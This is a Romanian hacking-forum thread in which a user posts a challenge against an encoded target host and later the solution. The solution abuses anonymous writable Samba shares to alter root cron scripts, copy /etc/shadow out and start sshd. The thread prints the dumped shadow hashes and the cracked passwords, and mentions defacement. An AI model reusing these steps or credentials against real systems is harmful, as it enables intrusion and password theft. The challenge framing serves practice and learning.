Jump to content
pyth0n3

Dump /etc/shadow ; Get ssh access

Recommended Posts

Posted

Target = ZnJlZXNoZWxsLmhvbWVsaW51eC5uZXQ=

1. Dump /etc/shadow (Note: the permissions are set to -rw-r----- 1 root

shadow xxx xxxx-xx-xx xx:xx /etc/shadow)

2. Get ssh access (Note: SSH is Not runnig) but must get ssh access

Optional: (Deface the page )

Time = 48 hours

Hint: The remote system is misconfigured , an attacker may gain access

80/tcp open http

21/tcp filtered ftp

139/tcp open netbios-ssn

445/tcp open microsoft-ds

23/tcp open telnet

53/tcp open domain

5000/tcp open upnp

22/tcp filtered ssh (Note: Service is not running)

OS: Linux Debian 2.26-686

Posted (edited)

Dezavantajul unui challenge este atunci cînd careva î?i pune un server off ,cu un exploit sau ma rog , bineîn?eles f?r? sa î?i ating? scopul

No problem , system down ,sa terminat aici ! stim ca exista si script-kiddies

Pt a avea acces nu era nevoie de nici un fel de exploit

Pe server rula samba la care se putea conecta oricine în mod anonymous si avea dreptul read & write

Cron rula în acela?i timp doua scripturi in /usr/local/bin ca user root

Bineîn?eles un user anonymous avea access read write la aceste scripturi

Deci putea modifica în asa fel încît sa porneasc? un server ssh sau sa fac? dump la etc shadow

Un script se chema backup ?i rula în fiecare minut in cron

Deci pt a avea password urile se trebuia doar ad?ugat un command care va copia /etc/shadow intrun directo în care userul nobody avea access ?i le putea descarca folosind samba

Code:

cat /etc/shadow > /public/pass_to_download 

si descarca passwordurile

In al doilea script se putea spre exemplu rula ssh

#!/bin/bash
LOG=/var/log/sshlog
SERVICE='sshd'

if ps ax | grep -v grep | grep $SERVICE > /dev/null
then
echo `date` "$SERVICE service running, everything is fine" >> $LOG
else
echo `date` "$SERVICE is not running" >> $LOG
echo `date` `/etc/init.d/ssh start` >> $LOG

fi

Trebuia doar creat un cod in bash care va face start la sshd

Se decriptau passwordurile cu john si se putea conecta la ssh

Pt a face deface un user anonymous se conecta la serverul samba in /var/www si schimba pagina cu o alta pagina

Toate aceste lucruri se puteau face din windows sau ma rog un sistem unix/linux

Nu era nevoie de nici o password

Connecting to the School's file servers (Samba shares) from Windows XP

Din linux:

sudo smbclient -L host -N

-N pt anonymous

-L pt list shares

sudo smbclient //host/path_to_directory -N

Get sau put pt download si upload

Sau ma rog se f?cea un smbmount intrun director

Password file

root:$1$lAYHe99p$mC7AsGKl5olnuGeTlzuwh.:14932:0:99999:7:::
daemon:!!:14884:0:99999:7:::
bin:!!:14884:0:99999:7:::
sys:!!:14884:0:99999:7:::
sync:!!:14884:0:99999:7:::
games:!!:14884:0:99999:7:::
man:!!:14884:0:99999:7:::
lp:!!:14884:0:99999:7:::
mail:!!:14884:0:99999:7:::
news:!!:14884:0:99999:7:::
uucp:!!:14884:0:99999:7:::
proxy:!!:14884:0:99999:7:::
www-data:!!:14884:0:99999:7:::
backup:!!:14884:0:99999:7:::
list:!!:14884:0:99999:7:::
irc:!!:14884:0:99999:7:::
gnats:!!:14884:0:99999:7:::
nobody:!!:14884:0:99999:7:::
libuuid:!:14884:0:99999:7:::
Debian-exim:!:14884:0:99999:7:::
statd:!!:14884:0:99999:7:::
messagebus:!!:14884:0:99999:7:::
avahi:!!:14884:0:99999:7:::
haldaemon:!!:14884:0:99999:7:::
hplip:!!:14884:0:99999:7:::
sshd:!!:14902:0:99999:7:::
telnetd:!!:14926:0:99999:7:::
bind:!!:14926:0:99999:7:::
david:$1$m6nPi1bo$jnLrqPmtMVE9Anqk4hzzl.:14932:0:::::0

Video -> Watch Online

David = abc123

Root = tester123

Daca pe cineva îl intereseaz? sa creeze un challenge sau vrea sa ma ajute sa fac altele contacta?i-ma

Edited by pyth0n3
Posted
ce distributie de linux folosesti ? arata foarte bine :D

Foloseste Debian. Multumesc idiotilor care au futut server-ul, au dat si ei wget la un exploit pentru 2.6, l-au rulat si apoi uzi la chilotei au distrus challenge-u.

Posted

nu ma refeream la sistemul de test ci la al lui desktop dupa care a lucrat sau si ala e tot debian ? + nu cumva a inchis el serverul ? deoarece vad ca deja a postat solutia

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...